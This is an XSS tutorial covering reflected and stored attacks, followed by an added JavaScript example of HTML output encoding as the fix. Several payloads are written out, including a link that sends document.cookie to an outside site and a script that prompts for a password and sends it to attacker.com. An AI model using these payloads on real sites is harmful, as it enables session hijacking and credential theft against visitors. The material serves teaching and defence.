XSS is the most common web application security flaw. XSS flaws occur when an application includes user-supplied data in a page sent to the browser without properly validating or escaping that content. The three known types of XSS vulnerabilities that we will cover are:

* Reflected XSS
* Stored XSS
* DOM Based XSS
```javascript
console.log('Does this even work?'); alert('I am a bAd@$$ H@cK3r');
```
In these exercises we will use GET request payloads, so we edit the inputs directly in the GET URL.
You should get a popup window on your screen with the word "hello".
We can also redirect the user to a different website of our choosing:

```
?firstname=simeon&lastname=<script>window.location="http://www.simeonkakpovi.com";</script>
```
Although this may seem benign, it becomes malicious when the user's credentials are sent along with the redirect. The receiving website can parse those credentials without the user ever knowing.

Alternatively, we can place a link or image on the page that takes some action when the user clicks or hovers over it:

```html
<a onmouseover='alert("you’ve been pwned")'>Kakpovi</a>
```
In a stored XSS attack, the injected input is saved by the application and displayed to every other user who visits the site. Take for example a blog, or a comment section.

The following examples could be used to compromise visiting users:

```html
<a onmouseover="alert('just kidding, youve been pwned')">Hello I am just an innocent comment</a>

<a href="youtube.com" onmouseover='window.location="http://simeonkakpovi.com ?content="+document.cookie'>Hello I am just an innocent comment</a>

<script>alert("We need your password!");password=prompt("Enter password...","");document.location="http://attacker.com/catch.php ?password="+encodeURI(password);</script>
```
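The root cause shared by the reflected `?firstname=…&lastname=…` example and the stored comment examples is raw concatenation of untrusted input into HTML, and output encoding is the fix. The following is an added, defender-side example that is not part of the original page; the function names `escapeHtml`, `renderGreetingUnsafe`, `renderGreetingSafe`, `renderFromUrl`, `tagDelimiterCount` and the host `example.test` are my own assumptions.

```javascript
// Added example, not from the original page: HTML output encoding, the
// mitigation that neutralises the reflected and stored payloads shown above.
// Runs in Node.js or a browser with no dependencies. All names are assumptions.

// Encode the five characters that carry meaning in an HTML text node or a
// double-quoted attribute value. Use it for HTML text/attribute contexts only;
// a JavaScript string or a URL context needs its own context-specific encoder.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: raw query values concatenated into markup, the same
// pattern the ?firstname=...&lastname=... exercise page relies on.
function renderGreetingUnsafe(firstname, lastname) {
  return '<p>Hello ' + firstname + ' ' + lastname + '</p>';
}

// Hardened rendering: identical markup, every untrusted value encoded first.
function renderGreetingSafe(firstname, lastname) {
  return '<p>Hello ' + escapeHtml(firstname) + ' ' + escapeHtml(lastname) + '</p>';
}

// Pull the two parameters out of a GET URL and render through either path.
// URLSearchParams undoes the percent-encoding the URL parser applies to < > ".
function renderFromUrl(url, safe) {
  const params = new URL(url).searchParams;
  const first = params.get('firstname') || '';
  const last = params.get('lastname') || '';
  return safe ? renderGreetingSafe(first, last) : renderGreetingUnsafe(first, last);
}

// Count '<' characters: safe output contains exactly the two tags we wrote
// ourselves, so any extra delimiter means attacker markup reached the browser.
function tagDelimiterCount(html) {
  return (html.match(/</g) || []).length;
}

// Constructed sample request (hypothetical host) carrying a script payload.
const SAMPLE_URL =
  'http://example.test/greet?firstname=simeon&lastname=<script>alert("hello")</script>';

console.log(renderFromUrl(SAMPLE_URL, false)); // script element reaches the browser
console.log(renderFromUrl(SAMPLE_URL, true));  // payload rendered as literal text
```

The same encoder defuses the `<a onmouseover=…>` comment payloads, because the leading `<` becomes `&lt;` and the browser never creates an element or an event handler from it.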